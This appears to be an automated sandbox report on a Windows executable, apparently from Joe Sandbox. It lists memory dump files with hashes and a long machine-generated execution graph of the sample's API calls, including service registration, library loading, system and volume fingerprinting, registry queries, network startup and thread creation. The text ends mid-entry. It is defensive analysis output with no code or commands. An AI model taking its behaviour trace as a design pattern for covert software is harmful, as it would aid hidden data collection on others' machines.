                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: fprintf
                                                      • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                      • API String ID: 383729395-2468659920
                                                      • Opcode ID: 1e66a750eef62416fe29ac226196076c421e718d702112074ece5bc511332d35
                                                      • Instruction ID: 7a9934c410feb340f5a857ab256ae43bb943c7fe2c7fb50d86a13eb3127c6b47
                                                      • Opcode Fuzzy Hash: 1e66a750eef62416fe29ac226196076c421e718d702112074ece5bc511332d35
                                                      • Instruction Fuzzy Hash: A1F01D66808F84C2D2118F18E4402ABB370FFAE789F205326FFC86A628DF2DD5428704
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2383560918.00007FF7A70C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7A70C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2383547524.00007FF7A70C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2383577490.00007FF7A70D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2383577490.00007FF7A76CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2384383201.00007FF7A7ADE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2384407138.00007FF7A7AE6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2384407138.00007FF7A7AE8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2384442556.00007FF7A7AE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2384458896.00007FF7A7AEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff7a70c0000_31yd7ynpdj6jw5vl4xn9qyj7u.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4189dc0bd0b40e525df6bacc68198785b1c73d26038d43092f54cabf3c1e858b
                                                      • Instruction ID: b0a02467c6f3cb0f1f87f9b3e2142c9dc0e6805e1d94184d8e9555711fdafc5f
                                                      • Opcode Fuzzy Hash: 4189dc0bd0b40e525df6bacc68198785b1c73d26038d43092f54cabf3c1e858b
                                                      • Instruction Fuzzy Hash: C4B012B0A06241C4E7003F15DC4125D76206B15700FC30030C80C03372CF7C54524B31

                                                      Execution Graph

                                                      Execution Coverage:6%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:3.4%
                                                      Total number of Nodes:2000
                                                      Total number of Limit Nodes:29
                                                      execution_graph 60397 7ff70cad1b75 60427 7ff70cad161a 60397->60427 60400 7ff70cad1be4 RegisterServiceCtrlHandlerA 60401 7ff70cad1c04 60400->60401 60402 7ff70cad1c25 GetLastError 60400->60402 60446 7ff70cad1360 SetServiceStatus 60401->60446 60404 7ff70cad2ef2 6 API calls 60402->60404 60403 7ff70cad1bac 60505 7ff70cad1a63 10 API calls 60403->60505 60423 7ff70cad1b85 60404->60423 60407 7ff70cad1c19 60447 7ff70cad16e3 60407->60447 60410 7ff70cad1d18 60484 7ff70cad2ef2 60410->60484 60412 7ff70cad1bb1 60506 7ff70cad1b1c 13 API calls 60412->60506 60415 7ff70cad1bb6 60417 7ff70cad1dad ExitProcess 60415->60417 60418 7ff70cad1bbe 60415->60418 60416 7ff70cad1d48 60421 7ff70cad2ef2 6 API calls 60416->60421 60422 7ff70cad1bdd 60418->60422 60507 7ff70cad1360 SetServiceStatus 60418->60507 60419 7ff70cad1d71 60419->60417 60420 7ff70cad1d32 60420->60416 60495 7ff70cad19e2 60420->60495 60425 7ff70cad1b8d 60421->60425 60423->60419 60423->60425 60483 7ff70cad1360 SetServiceStatus 60423->60483 60425->60403 60504 7ff70cad1360 SetServiceStatus 60425->60504 60508 7ff70cad1fd0 GetModuleHandleExA 60427->60508 60432 7ff70cad164c 60445 7ff70cad1650 60432->60445 60570 7ff70cad28fc 60432->60570 60440 7ff70cad1fd0 8 API calls 60441 7ff70cad16b0 60440->60441 60442 7ff70cad7689 12 API calls 60441->60442 60443 7ff70cad16c9 60442->60443 60443->60445 60622 7ff70cad3452 60443->60622 60445->60400 60445->60423 60446->60407 60448 7ff70cad1fd0 8 API calls 60447->60448 60449 7ff70cad172e 60448->60449 60450 7ff70cad758b 8 API calls 60449->60450 60451 7ff70cad1743 60450->60451 60452 7ff70cad174d strlen 60451->60452 60464 7ff70cad1942 60451->60464 60454 7ff70cad1783 _mbscpy strlen strlen 60452->60454 60455 7ff70cad176a 60452->60455 60453 7ff70cad197a 60453->60423 60465 7ff70cad17ca 60454->60465 60455->60454 60456 7ff70cad176f strlen 60455->60456 60456->60454 60457 7ff70cad1938 61028 7ff70cad4788 FindClose 60457->61028 60459 7ff70cad47a3 12 API calls 60459->60465 60460 7ff70cad1959 60462 7ff70cad2ef2 6 API calls 60460->60462 60461 7ff70cad2ef2 6 API calls 60461->60464 60462->60453 60463 7ff70cad2304 8 API calls 60463->60465 60464->60453 60464->60460 60464->60461 60940 7ffdac128a60 60464->60940 60958 7ffda55d1b80 60464->60958 60971 7ffda55754b0 60464->60971 60986 7ffda55aff40 60464->60986 61003 7ffda5ba90d0 60464->61003 61014 7ffdac0f1290 60464->61014 61029 7ff70cad1360 SetServiceStatus 60464->61029 60465->60457 60465->60459 60465->60463 60466 7ff70cad2283 8 API calls 60465->60466 60468 7ff70cad1895 60465->60468 60469 7ff70cad17ee FreeLibrary 60465->60469 61027 7ff70cad1360 SetServiceStatus 60465->61027 60466->60465 60470 7ff70cad2ef2 6 API calls 60468->60470 60469->60465 60471 7ff70cad18ad GetProcessHeap HeapAlloc 60470->60471 60473 7ff70cad18cf _mbscpy 60471->60473 60474 7ff70cad18f6 60471->60474 60473->60474 60475 7ff70cad191b 60473->60475 60476 7ff70cad2ef2 6 API calls 60474->60476 60475->60457 60475->60475 60476->60475 60483->60410 60485 7ff70cad2f00 60484->60485 62526 7ff70cadaa60 60485->62526 60488 7ff70cad2fbc EnterCriticalSection 60491 7ff70cad2fd6 LeaveCriticalSection 60488->60491 60492 7ff70cad2ff3 60488->60492 60489 7ff70cad2f87 fwrite fflush 60490 7ff70cad2fb0 60489->60490 60490->60420 60491->60489 60493 7ff70cad302d CopyFileA 60492->60493 60494 7ff70cad3065 60493->60494 60494->60491 60496 7ff70cad1fd0 8 API calls 60495->60496 60497 7ff70cad1a11 60496->60497 60498 7ff70cad758b 8 API calls 60497->60498 60499 7ff70cad1a23 60498->60499 60500 7ff70cad1a29 60499->60500 60501 7ff70cad13cd 20 API calls 60499->60501 60500->60420 60502 7ff70cad1a3f 60501->60502 60502->60500 60503 7ff70cad1a4c SleepEx 60502->60503 60503->60500 60504->60403 60505->60412 60506->60415 60507->60422 60509 7ff70cad2002 GetLastError 60508->60509 60511 7ff70cad162f 60508->60511 60510 7ff70cad2ef2 6 API calls 60509->60510 60510->60511 60512 7ff70cad7689 60511->60512 60513 7ff70cad76cf 60512->60513 60514 7ff70cad769f 60512->60514 60516 7ff70cad2ef2 6 API calls 60513->60516 60645 7ff70cad758b 60514->60645 60518 7ff70cad1648 60516->60518 60518->60432 60523 7ff70cad685f 60518->60523 60519 7ff70cad76ff strlen 60520 7ff70cad7711 60519->60520 60521 7ff70cad7727 _mbscat strlen 60519->60521 60520->60521 60522 7ff70cad7716 strlen 60520->60522 60521->60518 60522->60521 60524 7ff70cad6876 60523->60524 60525 7ff70cad6962 60523->60525 60527 7ff70cad687f CreateFileA 60524->60527 60528 7ff70cad6992 60524->60528 60526 7ff70cad2ef2 6 API calls 60525->60526 60529 7ff70cad6917 60526->60529 60531 7ff70cad69c5 GetLastError 60527->60531 60532 7ff70cad68ca LockFileEx 60527->60532 60530 7ff70cad2ef2 6 API calls 60528->60530 60539 7ff70cad6c29 60529->60539 60540 7ff70cad6941 60529->60540 60530->60529 60533 7ff70cad2ef2 6 API calls 60531->60533 60534 7ff70cad68fe 60532->60534 60535 7ff70cad6aaa GetLastError 60532->60535 60543 7ff70cad69e6 60533->60543 60534->60529 60537 7ff70cad6c1b CloseHandle 60534->60537 60536 7ff70cad2ef2 6 API calls 60535->60536 60538 7ff70cad6acb 60536->60538 60537->60539 60545 7ff70cad6b13 60538->60545 60542 7ff70cad2ef2 6 API calls 60539->60542 60541 7ff70cad2ef2 6 API calls 60540->60541 60544 7ff70cad1669 60541->60544 60542->60544 60543->60535 60543->60545 60544->60445 60546 7ff70cad309c InitializeCriticalSectionAndSpinCount 60544->60546 60545->60537 60545->60538 60547 7ff70cad31ed GetLastError 60546->60547 60548 7ff70cad30ca 60546->60548 60550 7ff70cad2ef2 6 API calls 60547->60550 60549 7ff70cad1fd0 8 API calls 60548->60549 60551 7ff70cad30e6 60549->60551 60557 7ff70cad31c6 60550->60557 60552 7ff70cad758b 8 API calls 60551->60552 60553 7ff70cad30fa 60552->60553 60554 7ff70cad3104 strlen 60553->60554 60553->60557 60555 7ff70cad3133 60554->60555 60556 7ff70cad311d 60554->60556 60560 7ff70cad3158 strlen fopen 60555->60560 60561 7ff70cad3138 _mbscat strlen 60555->60561 60556->60555 60559 7ff70cad3122 strlen 60556->60559 60558 7ff70cad2ef2 6 API calls 60557->60558 60569 7ff70cad31e3 60558->60569 60559->60555 60562 7ff70cad31a4 60560->60562 60563 7ff70cad32ba 60560->60563 60561->60560 60564 7ff70cad2ef2 6 API calls 60562->60564 60565 7ff70cad2ef2 6 API calls 60563->60565 60566 7ff70cad31be 60564->60566 60565->60557 60566->60557 60567 7ff70cad332a 60566->60567 60568 7ff70cad2ef2 6 API calls 60567->60568 60568->60569 60569->60432 60659 7ff70cad2304 60570->60659 60574 7ff70cad2963 FreeLibrary 60577 7ff70cad29c3 GetNativeSystemInfo GetWindowsDirectoryA 60574->60577 60597 7ff70cad2999 60574->60597 60576 7ff70cad2ef2 6 API calls 60600 7ff70cad167e 60576->60600 60578 7ff70cad2ae0 60577->60578 60579 7ff70cad2a02 GetLastError 60577->60579 60582 7ff70cad2ef2 6 API calls 60578->60582 60581 7ff70cad2ef2 6 API calls 60579->60581 60581->60597 60584 7ff70cad2b01 60582->60584 60583 7ff70cad2ef2 6 API calls 60583->60574 60584->60597 60675 7ff70cad9242 60584->60675 60586 7ff70cad2b4d GetVolumeInformationA 60588 7ff70cad2bb0 GetLastError 60586->60588 60589 7ff70cad2ca7 60586->60589 60587 7ff70cad2ef2 6 API calls 60592 7ff70cad2b3d 60587->60592 60590 7ff70cad2ef2 6 API calls 60588->60590 60591 7ff70cad2ef2 6 API calls 60589->60591 60590->60592 60593 7ff70cad2cc4 60591->60593 60592->60586 60592->60587 60592->60597 60594 7ff70cad2cdb strlen 60593->60594 60595 7ff70cad2ced 60593->60595 60594->60595 60597->60576 60600->60445 60605 7ff70cad14ef 60600->60605 60606 7ff70cad1fd0 8 API calls 60605->60606 60607 7ff70cad1534 60606->60607 60608 7ff70cad758b 8 API calls 60607->60608 60609 7ff70cad1546 60608->60609 60610 7ff70cad1576 60609->60610 60611 7ff70cad154c _mbscpy 60609->60611 60613 7ff70cad2ef2 6 API calls 60610->60613 60702 7ff70cad13cd strlen 60611->60702 60615 7ff70cad15a1 60613->60615 60615->60440 60615->60445 60616 7ff70cad1572 60616->60610 60618 7ff70cad15f1 60616->60618 60620 7ff70cad2ef2 6 API calls 60618->60620 60620->60615 60623 7ff70cad3505 60622->60623 60624 7ff70cad347a 60622->60624 60625 7ff70cad2ef2 6 API calls 60623->60625 60626 7ff70cad4fc5 30 API calls 60624->60626 60627 7ff70cad3493 60625->60627 60637 7ff70cad3489 60626->60637 60628 7ff70cad34b4 60627->60628 60629 7ff70cad349d GetProcessHeap HeapFree 60627->60629 60630 7ff70cad37f2 60628->60630 60635 7ff70cad34dc 60628->60635 60629->60628 60631 7ff70cad2ef2 6 API calls 60630->60631 60632 7ff70cad35bd GetProcessHeap HeapAlloc 60633 7ff70cad3630 60632->60633 60642 7ff70cad35fa 60632->60642 60639 7ff70cad2ef2 6 API calls 60633->60639 60636 7ff70cad2ef2 6 API calls 60635->60636 60637->60627 60637->60632 60638 7ff70cad37ce 60638->60627 60639->60642 60641 7ff70cad3713 strncpy strncpy 60641->60642 60642->60627 60642->60638 60642->60641 60643 7ff70cad3788 strncpy 60642->60643 60643->60642 60646 7ff70cad75d2 60645->60646 60647 7ff70cad759c 60645->60647 60648 7ff70cad2ef2 6 API calls 60646->60648 60649 7ff70cad75a1 60647->60649 60650 7ff70cad7602 60647->60650 60656 7ff70cad75b7 60648->60656 60652 7ff70cad7632 60649->60652 60653 7ff70cad75aa 60649->60653 60651 7ff70cad2ef2 6 API calls 60650->60651 60651->60656 60654 7ff70cad2ef2 6 API calls 60652->60654 60658 7ff70cad744c 8 API calls 60653->60658 60654->60656 60656->60518 60656->60519 60657 7ff70cad75af 60657->60656 60658->60657 60660 7ff70cad2312 LoadLibraryA 60659->60660 60661 7ff70cad233b 60659->60661 60662 7ff70cad2320 60660->60662 60663 7ff70cad233e GetLastError 60660->60663 60661->60663 60665 7ff70cad2ef2 6 API calls 60662->60665 60664 7ff70cad2ef2 6 API calls 60663->60664 60666 7ff70cad2339 60664->60666 60665->60666 60666->60597 60667 7ff70cad2283 60666->60667 60668 7ff70cad22a0 GetProcAddress 60667->60668 60669 7ff70cad22d1 60667->60669 60670 7ff70cad22d6 GetLastError 60668->60670 60671 7ff70cad22b1 60668->60671 60669->60670 60673 7ff70cad2ef2 6 API calls 60670->60673 60672 7ff70cad2ef2 6 API calls 60671->60672 60674 7ff70cad22cf 60672->60674 60673->60674 60674->60574 60674->60583 60676 7ff70cad926b 60675->60676 60677 7ff70cad92ca 60675->60677 60679 7ff70cad9274 60676->60679 60680 7ff70cad932d 60676->60680 60678 7ff70cad2ef2 6 API calls 60677->60678 60699 7ff70cad9323 60677->60699 60678->60699 60681 7ff70cad9360 60679->60681 60682 7ff70cad927d 60679->60682 60683 7ff70cad2ef2 6 API calls 60680->60683 60684 7ff70cad2ef2 6 API calls 60681->60684 60685 7ff70cad9393 60682->60685 60686 7ff70cad9286 RegOpenKeyExA 60682->60686 60683->60699 60684->60699 60689 7ff70cad2ef2 6 API calls 60685->60689 60687 7ff70cad93c6 RegQueryValueExA 60686->60687 60688 7ff70cad92ad 60686->60688 60700 7ff70cad93f4 60687->60700 60701 7ff70cad9447 RegCloseKey 60687->60701 60691 7ff70cad2ef2 6 API calls 60688->60691 60689->60699 60690 7ff70cad96c9 60693 7ff70cad2ef2 6 API calls 60690->60693 60691->60677 60696 7ff70cad9569 60693->60696 60694 7ff70cad96ec 60695 7ff70cad9526 60695->60694 60698 7ff70cad2ef2 6 API calls 60695->60698 60696->60592 60697 7ff70cad2ef2 6 API calls 60697->60700 60698->60696 60699->60690 60699->60695 60700->60697 60700->60701 60701->60699 60703 7ff70cad13fd strlen 60702->60703 60704 7ff70cad13e7 60702->60704 60755 7ff70cad6e87 60703->60755 60704->60703 60705 7ff70cad13ec strlen 60704->60705 60705->60703 60707 7ff70cad1436 60707->60616 60715 7ff70cad7750 60707->60715 60708 7ff70cad1425 60708->60707 60710 7ff70cad1487 strlen 60708->60710 60712 7ff70cad14c8 60708->60712 60714 7ff70cad14b4 strlen 60708->60714 60761 7ff70cad47a3 60708->60761 60711 7ff70cad6e87 8 API calls 60710->60711 60711->60708 60785 7ff70cad4788 FindClose 60712->60785 60714->60708 60716 7ff70cad77f2 60715->60716 60717 7ff70cad7772 60715->60717 60718 7ff70cad2ef2 6 API calls 60716->60718 60719 7ff70cad7822 60717->60719 60720 7ff70cad777b 60717->60720 60725 7ff70cad77a6 60718->60725 60721 7ff70cad2ef2 6 API calls 60719->60721 60786 7ff70cad4fc5 60720->60786 60721->60725 60724 7ff70cad7a9e 60725->60724 60727 7ff70cad2ef2 6 API calls 60725->60727 60729 7ff70cad15c7 60727->60729 60729->60610 60756 7ff70cad6ea5 60755->60756 60757 7ff70cad6e90 GetFileAttributesA 60755->60757 60759 7ff70cad2ef2 6 API calls 60756->60759 60758 7ff70cad6ed5 GetLastError 60757->60758 60760 7ff70cad6e9b 60757->60760 60758->60760 60759->60760 60760->60708 60762 7ff70cad47c3 60761->60762 60763 7ff70cad4809 60761->60763 60765 7ff70cad4862 60762->60765 60766 7ff70cad47cc 60762->60766 60764 7ff70cad2ef2 6 API calls 60763->60764 60784 7ff70cad4853 60763->60784 60764->60784 60767 7ff70cad2ef2 6 API calls 60765->60767 60768 7ff70cad47d5 60766->60768 60769 7ff70cad489a 60766->60769 60767->60784 60771 7ff70cad47e1 FindNextFileA 60768->60771 60772 7ff70cad48d2 FindFirstFileA 60768->60772 60770 7ff70cad2ef2 6 API calls 60769->60770 60770->60784 60773 7ff70cad4922 GetLastError 60771->60773 60774 7ff70cad47f7 _mbscpy 60771->60774 60772->60774 60775 7ff70cad48f3 GetLastError 60772->60775 60776 7ff70cad4900 60773->60776 60777 7ff70cad494b 60773->60777 60774->60763 60775->60776 60779 7ff70cad4907 60775->60779 60776->60763 60784->60708 60785->60707 60787 7ff70cad5065 60786->60787 60788 7ff70cad4fe7 60786->60788 60789 7ff70cad2ef2 6 API calls 60787->60789 60790 7ff70cad4ff0 60788->60790 60791 7ff70cad50aa 60788->60791 61030 7ffdac12794c InitializeCriticalSectionAndSpinCount 60940->61030 60943 7ffdac128a79 60945 7ffdac128a7d 60943->60945 61099 7ffdac121fce WSAStartup 60943->61099 60946 7ffdac1277a2 6 API calls 60945->60946 60949 7ffdac128a9a 60946->60949 60949->60464 60951 7ffdac128aeb 60951->60945 61107 7ffdac1264f8 InitializeCriticalSectionAndSpinCount 60951->61107 61362 7ffda55d9f6c InitializeCriticalSectionAndSpinCount 60958->61362 60961 7ffda55d1b96 60970 7ffda55d1b9a 60961->60970 61431 7ffda55d296e WSAStartup 60961->61431 60970->60464 61589 7ffda557427c InitializeCriticalSectionAndSpinCount 60971->61589 60979 7ffda55754c6 60985 7ffda55754ca 60979->60985 61658 7ffda55762ae WSAStartup 60979->61658 60985->60464 61824 7ffda55ac9fc InitializeCriticalSectionAndSpinCount 60986->61824 60989 7ffda55aff56 61002 7ffda55aff5a 60989->61002 61893 7ffda55a8b63 InitializeCriticalSectionAndSpinCount 60989->61893 61002->60464 62071 7ffda5ba221c InitializeCriticalSectionAndSpinCount 61003->62071 61006 7ffda5ba90e6 61013 7ffda5ba90ea 61006->61013 62138 7ffda5ba328e WSAStartup 61006->62138 61011 7ffda5ba9131 61011->61013 62146 7ffda5ba3aa7 InitializeCriticalSectionAndSpinCount 61011->62146 61013->60464 62299 7ffdac0f14fc InitializeCriticalSectionAndSpinCount 61014->62299 61017 7ffdac0f12a6 61019 7ffdac0f12aa 61017->61019 62368 7ffdac0f4b5e WSAStartup 61017->62368 61019->60464 61023 7ffdac0f12f1 61023->61019 62376 7ffdac0f2b78 InitializeCriticalSectionAndSpinCount 61023->62376 61027->60465 61028->60464 61029->60464 61031 7ffdac127aa0 GetLastError 61030->61031 61032 7ffdac12797a 61030->61032 61034 7ffdac1277a2 6 API calls 61031->61034 61159 7ffdac127400 GetModuleHandleExA 61032->61159 61039 7ffdac127a79 61034->61039 61038 7ffdac1279b4 strlen 61041 7ffdac1279cd 61038->61041 61042 7ffdac1279e3 61038->61042 61040 7ffdac1277a2 6 API calls 61039->61040 61053 7ffdac127a96 61040->61053 61041->61042 61043 7ffdac1279d2 strlen 61041->61043 61044 7ffdac127a08 strlen fopen 61042->61044 61045 7ffdac1279e8 strcat strlen 61042->61045 61043->61042 61046 7ffdac127b6d 61044->61046 61047 7ffdac127a57 61044->61047 61045->61044 61048 7ffdac1277a2 6 API calls 61046->61048 61049 7ffdac1277a2 6 API calls 61047->61049 61048->61039 61050 7ffdac127a71 61049->61050 61050->61039 61051 7ffdac127bdd 61050->61051 61052 7ffdac1277a2 6 API calls 61051->61052 61052->61053 61053->60943 61054 7ffdac128774 61053->61054 61055 7ffdac128796 61054->61055 61056 7ffdac1287d9 61054->61056 61177 7ffdac1283e0 61055->61177 61058 7ffdac1277a2 6 API calls 61056->61058 61063 7ffdac1287af 61058->61063 61060 7ffdac128809 _errno _strtoui64 _errno 61061 7ffdac12883c _errno 61060->61061 61060->61063 61062 7ffdac1277a2 6 API calls 61061->61062 61062->61063 61063->60945 61064 7ffdac126e0c 61063->61064 61219 7ffdac127734 61064->61219 61100 7ffdac122012 61099->61100 61101 7ffdac121fea 61099->61101 61103 7ffdac1277a2 6 API calls 61100->61103 61102 7ffdac1277a2 6 API calls 61101->61102 61104 7ffdac122004 61102->61104 61105 7ffdac12202b 61103->61105 61104->60951 61106 7ffdac1277a2 6 API calls 61105->61106 61106->61104 61108 7ffdac12651d CreateThread 61107->61108 61109 7ffdac12659b GetLastError 61107->61109 61110 7ffdac126673 GetLastError 61108->61110 61111 7ffdac126569 61108->61111 61112 7ffdac1277a2 6 API calls 61109->61112 61114 7ffdac1277a2 6 API calls 61110->61114 61113 7ffdac12676c 61111->61113 61118 7ffdac126576 61111->61118 61112->61118 61114->61118 61160 7ffdac127432 GetLastError 61159->61160 61161 7ffdac127428 61159->61161 61162 7ffdac1277a2 6 API calls 61160->61162 61163 7ffdac125dcb 61161->61163 61162->61161 61164 7ffdac125e12 61163->61164 61165 7ffdac125ddc 61163->61165 61166 7ffdac1277a2 6 API calls 61164->61166 61167 7ffdac125e42 61165->61167 61168 7ffdac125de1 61165->61168 61174 7ffdac125df7 61166->61174 61169 7ffdac1277a2 6 API calls 61167->61169 61170 7ffdac125e72 61168->61170 61171 7ffdac125dea 61168->61171 61169->61174 61172 7ffdac1277a2 6 API calls 61170->61172 61176 7ffdac125c8c 8 API calls 61171->61176 61172->61174 61174->61038 61174->61039 61175 7ffdac125def 61175->61174 61176->61175 61178 7ffdac1283f1 61177->61178 61179 7ffdac128429 61177->61179 61185 7ffdac1280c9 61178->61185 61180 7ffdac1277a2 6 API calls 61179->61180 61184 7ffdac128408 61180->61184 61184->61060 61184->61063 61186 7ffdac1280e1 61185->61186 61187 7ffdac1280fc 61185->61187 61189 7ffdac12812f 61186->61189 61190 7ffdac1280e6 61186->61190 61188 7ffdac1277a2 6 API calls 61187->61188 61196 7ffdac128125 61188->61196 61191 7ffdac1277a2 6 API calls 61189->61191 61192 7ffdac128162 61190->61192 61195 7ffdac1280eb 61190->61195 61191->61196 61193 7ffdac1277a2 6 API calls 61192->61193 61193->61196 61194 7ffdac1281cc 61194->61196 61198 7ffdac1281d3 61194->61198 61195->61194 61197 7ffdac1281a1 strcmp 61195->61197 61199 7ffdac1277a2 6 API calls 61196->61199 61197->61195 61200 7ffdac1277a2 6 API calls 61198->61200 61201 7ffdac1281e9 61199->61201 61200->61201 61201->61184 61202 7ffdac128250 61201->61202 61220 7ffdac127742 LoadLibraryA 61219->61220 61221 7ffdac12776b 61219->61221 61222 7ffdac12776e GetLastError 61220->61222 61223 7ffdac127750 61220->61223 61221->61222 61225 7ffdac1277a2 6 API calls 61222->61225 61224 7ffdac1277a2 6 API calls 61223->61224 61226 7ffdac126e20 61224->61226 61225->61226 61363 7ffda55d9f9a 61362->61363 61364 7ffda55da0c0 GetLastError 61362->61364 61467 7ffda55d4ac0 GetModuleHandleExA 61363->61467 61365 7ffda55d9dc2 6 API calls 61364->61365 61377 7ffda55da099 61365->61377 61370 7ffda55d9fd4 strlen 61372 7ffda55da003 61370->61372 61373 7ffda55d9fed 61370->61373 61371 7ffda55d9dc2 6 API calls 61385 7ffda55d1b92 61371->61385 61375 7ffda55da028 strlen fopen 61372->61375 61376 7ffda55da008 strcat strlen 61372->61376 61373->61372 61374 7ffda55d9ff2 strlen 61373->61374 61374->61372 61378 7ffda55da077 61375->61378 61379 7ffda55da18d 61375->61379 61376->61375 61377->61371 61484 7ffda55d9dc2 61378->61484 61381 7ffda55d9dc2 6 API calls 61379->61381 61381->61377 61385->60961 61386 7ffda55dad94 61385->61386 61387 7ffda55dadf9 61386->61387 61388 7ffda55dadb6 61386->61388 61389 7ffda55d9dc2 6 API calls 61387->61389 61504 7ffda55daa00 61388->61504 61391 7ffda55d1bd1 61389->61391 61391->60970 61396 7ffda55d44cc 61391->61396 61393 7ffda55dae29 _errno _strtoui64 _errno 61393->61391 61394 7ffda55dae5c _errno 61393->61394 61395 7ffda55d9dc2 6 API calls 61394->61395 61395->61391 61546 7ffda55d4df4 61396->61546 61432 7ffda55d298a 61431->61432 61433 7ffda55d29b2 61431->61433 61434 7ffda55d9dc2 6 API calls 61432->61434 61435 7ffda55d9dc2 6 API calls 61433->61435 61438 7ffda55d1be1 61434->61438 61436 7ffda55d29cb 61435->61436 61437 7ffda55d9dc2 6 API calls 61436->61437 61437->61438 61438->60970 61439 7ffda55d17f8 InitializeCriticalSectionAndSpinCount 61438->61439 61440 7ffda55d189b GetLastError 61439->61440 61441 7ffda55d181d CreateThread 61439->61441 61442 7ffda55d9dc2 6 API calls 61440->61442 61443 7ffda55d1869 61441->61443 61444 7ffda55d1973 GetLastError 61441->61444 61445 7ffda55d1876 61442->61445 61443->61445 61447 7ffda55d1a6c 61443->61447 61446 7ffda55d9dc2 6 API calls 61444->61446 61449 7ffda55d9dc2 6 API calls 61445->61449 61446->61445 61448 7ffda55d9dc2 6 API calls 61447->61448 61450 7ffda55d1893 61448->61450 61449->61450 61450->60970 61468 7ffda55d4ae8 61467->61468 61469 7ffda55d4af2 GetLastError 61467->61469 61471 7ffda55d89db 61468->61471 61470 7ffda55d9dc2 6 API calls 61469->61470 61470->61468 61472 7ffda55d89ec 61471->61472 61473 7ffda55d8a22 61471->61473 61474 7ffda55d8a52 61472->61474 61475 7ffda55d89f1 61472->61475 61476 7ffda55d9dc2 6 API calls 61473->61476 61479 7ffda55d9dc2 6 API calls 61474->61479 61477 7ffda55d89fa 61475->61477 61478 7ffda55d8a82 61475->61478 61482 7ffda55d8a07 61476->61482 61495 7ffda55d889c 8 API calls 61477->61495 61480 7ffda55d9dc2 6 API calls 61478->61480 61479->61482 61480->61482 61482->61370 61482->61377 61483 7ffda55d89ff 61483->61482 61485 7ffda55d9dd0 61484->61485 61496 7ffda55dd580 61485->61496 61495->61483 61497 7ffda55dd5a5 61496->61497 61498 7ffda55dd58e 61496->61498 61505 7ffda55daa49 61504->61505 61506 7ffda55daa11 61504->61506 61507 7ffda55d9dc2 6 API calls 61505->61507 61512 7ffda55da6e9 61506->61512 61511 7ffda55daa28 61507->61511 61511->61391 61511->61393 61513 7ffda55da71c 61512->61513 61514 7ffda55da701 61512->61514 61515 7ffda55d9dc2 6 API calls 61513->61515 61516 7ffda55da706 61514->61516 61517 7ffda55da74f 61514->61517 61523 7ffda55da745 61515->61523 61519 7ffda55da782 61516->61519 61521 7ffda55da70b 61516->61521 61518 7ffda55d9dc2 6 API calls 61517->61518 61518->61523 61520 7ffda55d9dc2 6 API calls 61519->61520 61520->61523 61522 7ffda55da7ec 61521->61522 61524 7ffda55da7c1 strcmp 61521->61524 61522->61523 61525 7ffda55da7f3 61522->61525 61526 7ffda55d9dc2 6 API calls 61523->61526 61524->61521 61528 7ffda55da809 61526->61528 61528->61511 61547 7ffda55d4e2b 61546->61547 61548 7ffda55d4e02 LoadLibraryA 61546->61548 61549 7ffda55d4e2e GetLastError 61547->61549 61548->61549 61550 7ffda55d4e10 61548->61550 61551 7ffda55d9dc2 6 API calls 61549->61551 61552 7ffda55d9dc2 6 API calls 61550->61552 61553 7ffda55d44e0 61551->61553 61552->61553 61590 7ffda55743d0 GetLastError 61589->61590 61591 7ffda55742aa 61589->61591 61592 7ffda55740d2 13 API calls 61590->61592 61702 7ffda5572700 GetModuleHandleExA 61591->61702 61601 7ffda55743a9 61592->61601 61597 7ffda55742e4 strlen 61599 7ffda5574313 61597->61599 61600 7ffda55742fd 61597->61600 61598 7ffda55740d2 13 API calls 61604 7ffda55743c6 61598->61604 61602 7ffda5574338 strlen fopen 61599->61602 61603 7ffda5574318 strcat strlen 61599->61603 61600->61599 61605 7ffda5574302 strlen 61600->61605 61601->61598 61606 7ffda557449d 61602->61606 61607 7ffda5574387 61602->61607 61603->61602 61604->60979 61613 7ffda55751c4 61604->61613 61605->61599 61609 7ffda55740d2 13 API calls 61606->61609 61719 7ffda55740d2 61607->61719 61609->61601 61614 7ffda5575229 61613->61614 61615 7ffda55751e6 61613->61615 61617 7ffda55740d2 13 API calls 61614->61617 61739 7ffda5574e30 61615->61739 61619 7ffda55751ff 61617->61619 61619->60985 61623 7ffda557210c 61619->61623 61620 7ffda5575259 _errno _strtoui64 _errno 61620->61619 61621 7ffda557528c _errno 61620->61621 61622 7ffda55740d2 13 API calls 61621->61622 61622->61619 61781 7ffda5572a34 61623->61781 61659 7ffda55762f2 61658->61659 61660 7ffda55762ca 61658->61660 61662 7ffda55740d2 13 API calls 61659->61662 61661 7ffda55740d2 13 API calls 61660->61661 61663 7ffda5575511 61661->61663 61664 7ffda557630b 61662->61664 61663->60985 61666 7ffda5578f74 InitializeCriticalSectionAndSpinCount 61663->61666 61665 7ffda55740d2 13 API calls 61664->61665 61665->61663 61667 